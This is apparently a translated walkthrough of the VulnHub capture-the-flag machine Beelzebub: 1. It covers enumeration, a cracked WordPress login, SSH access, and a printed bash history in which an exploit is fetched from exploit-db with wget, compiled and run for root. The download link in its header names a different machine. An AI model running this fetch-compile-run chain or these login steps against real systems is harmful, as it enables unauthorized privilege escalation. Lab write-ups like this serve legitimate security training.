- 英文名称:BEELZEBUB: 1
- Chinese name: Beelzebub: 1
- Published date: September 8, 2021
- Difficulty: Easy
- Description: You have to enumerate as much as you can, and don't forget Base64.
- Download: https://www.vulnhub.com/entry/empire-breakout,751/
AILX10
Excellent answerer in cybersecurity
Master's in Cybersecurity
Go to consult
1. Boot information, know the username (krampus)
Boot information
2. Host discovery (192.168.199.146)
Host discovery
3. Port scanning (22, 80 ports)
Port scanning
4. Check the web page
web pages
5. Scan the catalog
dirb http://192.168.199.146/
或
dirsearch -u http://192.168.199.146/
Scan the catalog
6. Visit the home page of index
index homepage
Check the source code on the front page of index to get clues
<!--My heart was encrypted, "beelzebub" somehow hacked and decoded it.-md5-->
source code on the index home page
7. MD5 calculation processing for beelzebub
└─# echo -n 'beelzebub'|md5sum|cut -d ' ' -f1
d18e1e22becbd915b45e0e655429d487
MD5 calculations
8. Tried to access the link, but was redirected by 301
Suspected WordPress site
9. Try to traverse the directory, and you can be sure that it is a WordPress site
dirsearch -u http://192.168.199.146/d18e1e22becbd915b45e0e655429d487/
Traverse the directory
10. Try to access uploads
uploads
点击 talk to valak
签订契约的人有时会试图智取魔鬼,但最终还是失败了。
talk to valak
11、尝试burp分析,拿到密码 M4k3Ad3a1
BURP analysis
12. Try SSH login
SSH login
13. Successfully obtain the flag of ordinary users
Normal flag
14. Digging clues (.bash_history)
krampus@beelzebub:~$ ls -la
total 104
drwsrwxrwx 17 krampus krampus 4096 Mar 20 2021 .
drwxr-xr-x 3 root root 4096 Mar 16 2021 ..
-rw------- 1 krampus krampus 1407 Mar 20 2021 .bash_history
drwx------ 11 krampus krampus 4096 Mar 20 2021 .cache
drwxrwxrwx 14 krampus krampus 4096 May 26 2020 .config
drwxrwxrwx 3 krampus krampus 4096 Oct 20 2019 .dbus
drwxrwxrwx 2 krampus krampus 4096 Mar 19 2021 Desktop
drwxrwxrwx 2 krampus krampus 4096 Apr 8 2020 Documents
drwxrwxrwx 2 krampus krampus 4096 Mar 19 2021 Downloads
drwxrwxrwx 3 krampus krampus 4096 Oct 20 2019 .gnupg
drwxrwxrwx 2 krampus krampus 4096 Oct 20 2019 .gvfs
-rwxrwxrwx 1 krampus krampus 12844 Mar 20 2021 .ICEauthority
drwxr-xr-x 3 krampus krampus 4096 Mar 19 2021 .local
drwxrwxrwx 5 krampus krampus 4096 Apr 2 2020 .mozilla
drwxrwxrwx 2 krampus krampus 4096 Oct 20 2019 Music
drwxrwxrwx 2 krampus krampus 4096 Oct 21 2019 Pictures
-rwxrwxrwx 1 krampus krampus 807 Oct 20 2019 .profile
drwxrwxrwx 2 krampus krampus 4096 Oct 20 2019 Public
-rwxrwxrwx 1 krampus krampus 66 Oct 20 2019 .selected_editor
-rw-rw-r-- 1 krampus krampus 83 May 26 2020 .Serv-U-Tray.conf
-rwxrwxrwx 1 krampus krampus 0 Oct 20 2019 .sudo_as_admin_successful
drwxrwxrwx 2 krampus krampus 4096 Oct 20 2019 Templates
drwxrwxrwx 2 krampus krampus 4096 Oct 20 2019 Videos
-rw-rw-r-- 1 krampus krampus 173 Mar 20 2021 .wget-hsts
15. View history
krampus@beelzebub:~$ cat .bash_history
mysql -u root -p
clear
su root
clear
lks
ls
clear
nano /etc/host
nano /etc/hosts
su root
su root
rm -rf sudo-1.9.6p1 sudo-1.9.6p1.tar.gz wordpress-5.3.2.zip
su root
clear
exit
chmod 0750 html/
ifconfig
cd /var/lib/mysql/
clear
ls
cd wordpress/
sudo su
su root
clear
ls
cd Desktop/
clear
ls
cat user.txt
clear
uname -a
sudo -1
sudo -i
clear
uname -a
sudo -i
find / -prem -u=s -type f 2>/dev/null
find / -prem -u=s -type f 2>/dev/null
cat /etc/issue
sudo -l
cd
cd ../
cd ../../../../
clear
find / -prem -u=s -type f 2>/dev/null
cd /usr/local/Serv-U/
ls
cd
clear
ps -aux
ps -a
ps -a -U root
ps -a -U root | grep 'Serv'
ps -U root -au
ps -U root -au | sort -u
clear
cd /tmp/
clear
find / -prem -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
clear
find / -perm -u=s -type f 2>/dev/null
clear
wget https://www.exploit-db.com/download/47009
clear
ls
clear
mv 47009 ./exploit.c
gcc exploit.c -o exploit
./exploit
cd ../../../../../../../
ls
cd cd
cd
grep -r 'beelzebub'
grep -r 'love'
cd .local/share
clear
ls
cd Trash/
ls
cat info
cd info
ls
ls -la
cd ../
clear
cd ../
ls
rm -rf Trash/
clear
su root
history -R
history -r
mysql -u root -p
clear
su root
clear
lks
ls
clear
nano /etc/host
nano /etc/hosts
su root
su root
rm -rf sudo-1.9.6p1 sudo-1.9.6p1.tar.gz wordpress-5.3.2.zip
su root
clear
exit
history
clear
cd
clear
ip link
su root
clear
ls
history
clear
ls
cd /tmp/
ls
su root
exit
clear
16. According to the prompts in .bash_history, complete the privilege escalation and obtain the flag of root
Repetition
At this point, the experiment is complete~
Posted on 2022-08-22 21:46